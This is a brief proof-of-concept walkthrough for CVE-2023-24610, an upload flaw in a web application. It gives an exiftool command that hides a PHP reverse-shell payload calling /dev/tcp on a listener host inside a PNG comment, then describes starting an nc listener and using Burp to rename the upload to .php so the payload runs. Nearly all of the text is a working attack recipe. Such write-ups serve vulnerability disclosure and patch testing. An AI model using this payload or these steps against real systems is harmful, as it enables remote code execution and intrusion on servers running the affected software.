This is a proof of concept for CVE-2023-24610
We start by creating a polyglot file using exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php
We change the file to png so it will pass the front-end check
After that, we start a nc listener on port 8888 to receive the shell.
Next step is to log to the application and click on setup
On the bottom of the page, we see a practice logo area. We can upload a file using the edit button on the right side
We click on edit and then click on browse, we select the “.png” file we created on the first step
Before we click upload, we make sure we intercept the request with burp or something similar. We click upload and in burp we change the file extension from “png” to “php”
We switch the intercept off so our file gets uploaded and check the nc listener that we started before. We have a reverse shell and the IP points to our docker container.
